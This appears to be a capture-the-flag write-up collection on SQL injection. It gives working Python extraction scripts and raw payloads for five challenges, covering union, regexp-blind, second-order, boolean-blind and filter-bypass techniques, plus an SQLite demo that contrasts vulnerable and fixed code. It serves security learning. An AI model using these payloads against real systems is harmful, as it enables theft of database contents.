SQL Injection in CTFs

1. **[NSSCTF 2022 Spring Recruit]babysql**: a union-based injection with spaces filtered. The first few characters of the flag field are non-printable, so the value has to be read out with the substr function.

```python
import requests
import re

url = "http://node1.anna.nssctf.cn:28132"
temp = {"username": ""}
s = ""
# Read the flag one character at a time; /**/ replaces the filtered spaces.
for i in range(1, 69):
    temp["username"] = "2'/**/union/**/select/**/(select/**/substr(group_concat(flag),{},1)/**/from/**/flag)'".format(i)
    r1 = requests.post(url=url, data=temp)
    r1 = r1.text
    p = r'\"([^\"]*)\"[^\"]*$'  # match the content between the last pair of double quotes
    result = re.findall(p, r1)
    string = ''.join(result)  # findall returns a list; join it into a string
    print(string)
    s += string
print(s)
```

2. **[NCTF 2019]SQLi**: blind injection via regexp. regexp matches a regular expression; for example, `||/**/passwd/**/regexp/**/"^y"` asks whether the passwd field holds a string beginning with y, which is enough to build a blind injection.

```python
import requests
import string
from urllib import parse

url = "http://node4.anna.nssctf.cn:28680/"
s = string.digits + string.ascii_lowercase + "_"
passwd = ''
for i in range(100):
    for j in s:
        # parse.unquote() decodes the URL-encoded %00 into a literal null byte
        temp = {"username": "\\",
                "passwd": "||/**/passwd/**/regexp/**/\"^{}\";{}".format((passwd + j), parse.unquote('%00'))}
        res = requests.post(url, data=temp)
        #print(res.text)
        if "welcome" in res.text:
            passwd += j
            print(passwd)
            break
    else:
        # no candidate character matched: the password is complete
        break
print(passwd)
```

3. **[October 2019]Twice SQL Injection**: the injection point is the username on the registration page. Straight to the script:

```python
import requests
import re

url1 = 'http://node4.anna.nssctf.cn:28998/?action=reg'
url2 = 'http://node4.anna.nssctf.cn:28998/?action=login'
data1 = {"username": "admin' union select (select flag from flag)#", "password": "1"}
r1 = requests.post(url=url1, data=data1)  # register: the payload is stored as the username
r2 = requests.post(url=url2, data=data1)  # login: the stored username is used in a second query
#print(r2.text)
p = re.compile('<div>(.*?)</div>', re.S)
res = p.findall(r2.text)
res = ''.join(res)
print(res)
```
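The second-order flaw behind this challenge, as an added example that is not part of the writeup: registration stores the username safely, but the login path reads the stored value back and splices it into a second query. The in-memory SQLite schema and flag value are constructed for the example, and the payload uses SQLite's `--` comment where the writeup's MySQL payload uses `#`.

```python
import sqlite3

# Constructed stand-in for the challenge database (tables and flag are made up).
def setup_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed_example}');
    """)
    return con

def register(con, username, password):
    # First-order query is parameterized: the quote inside the username is
    # stored literally, which is what makes the stored value dangerous later.
    con.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def lookup_user(con, username, password):
    return con.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()

def login_vulnerable(con, username, password):
    row = lookup_user(con, username, password)
    if row is None:
        return []
    # Second-order query: the value read back from the database is trusted and
    # concatenated into SQL, so the stored quote breaks out of the string.
    sql = "SELECT username FROM users WHERE username='%s'" % row[0]
    return [r[0] for r in con.execute(sql)]

def login_fixed(con, username, password):
    row = lookup_user(con, username, password)
    if row is None:
        return []
    # Data read from the database is still data: bind it, never splice it.
    sql = "SELECT username FROM users WHERE username=?"
    return [r[0] for r in con.execute(sql, (row[0],))]

# The writeup's payload, adapted to SQLite's comment syntax.
PAYLOAD = "admin' UNION SELECT (SELECT flag FROM flag)-- "

def demo(login):
    con = setup_db()
    register(con, PAYLOAD, "1")
    return login(con, PAYLOAD, "1")

if __name__ == "__main__":
    print("vulnerable:", demo(login_vulnerable))  # the flag leaks into the result
    print("fixed:     ", demo(login_fixed))       # only the stored username comes back
```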

4. **[UUCTF 2022 新生赛]ezsql**: the input is reversed and `or` is filtered. Boolean-based blind injection works.

```python
import requests
from urllib.parse import quote

url = "http://node2.anna.nssctf.cn:28237/?user=&password="
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"}
l = 0
str1 = ''

# Step 1: find the flag length. The server reverses the input, so the payload is
# reversed before sending; "frroom" survives the "or" filter as "from".
for i in range(1, 100):
    s = "hardtoguess')+and+(length((select+UUCTF+frroom+UUCTF.flag))={})#".format(i)
    s = s[::-1]
    s = quote(s, safe='\'+)_')
    r1 = requests.get(headers=headers, url=url + s)
    #print(s)
    if "false" not in r1.text:
        l = i
        print(str(i))
        break

# Step 2: recover the flag one character at a time.
for i in range(1, l + 1):
    for j in range(31, 128):
        s = "hardtoguess')+and+(ascii(substr((select+UUCTF+frroom+UUCTF.flag),{},1))={})#".format(i, j)
        s = s[::-1]
        s = quote(s, safe='\'+)')  # new trick: quote() URL-encodes, and characters listed in safe are left unencoded
        r1 = requests.get(headers=headers, url=url + s)
        #print(r1.text)
        if "false" not in r1.text:
            #print(chr(j))
            str1 += chr(j)
            print(str1)
            break
    if l == len(str1):
        print(str1)
        break
```

5. **[HNCTF 2022 WEEK2]easy_sql**: spaces, information_schema.tables, and, and comments are filtered. information_schema.tables is replaced by mysql.innodb_table_stats, and schema_name by database_name.

```
1.1'union/**/select/**/1,2,database()/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

1.1'union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)b/**/where/**/'1
```

(Still being updated...)